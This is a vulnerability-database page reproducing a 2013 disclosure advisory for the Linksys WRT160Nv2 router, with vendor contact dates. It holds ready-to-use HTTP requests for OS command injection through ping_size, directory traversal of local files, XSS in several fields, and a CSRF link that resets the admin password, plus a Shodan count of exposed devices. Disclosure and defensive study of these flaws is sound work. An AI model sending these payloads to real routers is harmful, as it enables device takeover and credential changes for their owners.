Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linksys WRT160N XSS / CSRF / Command Injection

🗓️ 11 Feb 2013 00:00:00Reported by Michael MessnerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 43 Views

Linksys WRT160Nv2 Vulnerabilities: OS Command Injection, Directory Traversal, XS

Code
`Device Name: Linksys WRT160Nv2  
Vendor: Linksys/Cisco  
  
============ Device Description: ============  
  
Best For: Delivers plenty of speed and coverage, so large groups of users can go online, transfer large files, print, and stream stored media  
  
Features:  
* Fast Wireless-N connectivity frees you to do more around your home  
* Easy to set up and use, industrial-strength security protection  
* Great for larger homes with many users  
  
Source: http://homestore.cisco.com/en-us/routers/Linksys-WRT160N-Wireless-N-Router-Front-Page_stcVVproductId53934616VVcatId552009VVviewprod.htm  
  
============ Vulnerable Firmware Releases: ============  
  
Firmware Version: v2.0.03 build 009  
  
============ Shodan Torks ============  
  
Shodan Search: WRT160Nv2  
=> 4072 results  
  
============ Vulnerability Overview: ============  
  
* OS Command Injection  
  
=> parameter: ping_size  
  
The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.  
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.  
  
POST /apply.cgi HTTP/1.1  
Host: 192.168.178.233  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.178.233/Diagnostics.asp  
Authorization: Basic XXXX=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 181  
Connection: close  
  
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e101|&ping_times=5&traceroute_ip=  
  
Change the request methode from HTTP Post to HTTP GET makes the exploitation easier (CSRF):  
  
http://Target-IP/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e100|&ping_times=5&traceroute_ip=  
  
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-OS-Command-Injection.png  
  
* Directory traversal:  
  
=> parameter: next_page  
  
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.  
  
Request:  
POST /apply.cgi HTTP/1.1  
Host: 192.168.178.233  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.178.233/Wireless_Basic.asp  
Authorization: Basic XXXXX=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 77  
  
submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version  
  
Response:  
HTTP/1.1 200 Ok  
Server: httpd  
Date: Thu, 01 Jan 1970 02:53:16 GMT  
Cache-Control: no-cache  
Pragma: no-cache  
Expires: 0  
Content-Type: text/html  
Connection: close  
  
Linux version 2.4.30 (tcy@cybertan) (gcc version 3.3.6) #9 Fri Aug 21 11:23:36 CST 2009  
  
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-directory-traversal.png  
  
* XSS  
  
Injecting scripts into the parameter ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.  
  
=> Setup => DDNS  
=> parameter ddns_enable  
  
POST /apply.cgi HTTP/1.1  
Host: 192.168.178.233  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.178.233/DDNS.asp  
Authorization: Basic XXXXX=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 122  
  
submit_button=DDNS&action=&change_action=gozila_cgi&submit_type=&wait_time=6&ddns_changed=&ddns_enable='%3balert('pwnd')//  
  
=> Setup => Basic Setup  
=> parameter need_reboot  
  
POST /apply.cgi HTTP/1.1  
Host: 192.168.178.233  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.178.233/index.asp  
Authorization: Basic XXXX=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 568  
  
pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=pppoe&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot='%3balert('pwnd')//&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=pppoe&ppp_username=pwnd&ppp_passwd=d6nw5v1x2pc7st9m&ppp_service=pwnd&ppp_demand=0&ppp_redialperiod=30&wan_hostname=pwnd&wan_domain=pwnd&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=233&lan_netmask=255.255.255.0&lan_proto=static&time_zone=-08+1+1&_daylight_time=1  
  
=> Administration => Diagnostics  
=> parameter ping_ip and ping_size  
  
POST /apply.cgi HTTP/1.1  
Host: 192.168.178.233  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.178.233/Diagnostics.asp  
Authorization: Basic XXXX=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 201  
  
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1'><script>alert(2)</script>&ping_size=32'><script>alert(1)</script>&ping_times=5&traceroute_ip=  
  
It is possible that there are much more XSS Vulnerabilities in this device. I have stopped testing here ... so feel free to check more parameters for input validation problems and XSS vulnerabilities.  
  
* For changing the current password there is no request of the current password  
  
=> parameter: http_passwd and http_passwdConfirm  
  
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.  
  
POST /apply.cgi HTTP/1.1  
Host: 192.168.178.233  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.178.233/Management.asp  
Authorization: Basic XXXX=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 250  
  
submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0  
  
* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:  
  
http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0  
  
============ Solution ============  
  
No known solution available.  
  
============ Credits ============  
  
The vulnerability was discovered by Michael Messner  
Mail: devnull#at#s3cur1ty#dot#de  
Web: http://www.s3cur1ty.de/advisories  
Twitter: @s3cur1ty_de  
  
============ Time Line: ============  
  
Dezember 2012 - discovered vulnerability  
23.12.2012 - Contacted Linksys and give them detailed vulnerability details  
11.02.2013 - public release  
  
===================== Advisory end =====================  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Feb 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
linksys wrt160nv2vulnerabilitiescommand injectiondirectory traversalxssfast wireless-nindustrial strength securitylarge homesfirmware v2.0.03shodan searchcsrfping size parameternext page parameterddns enable parameter
43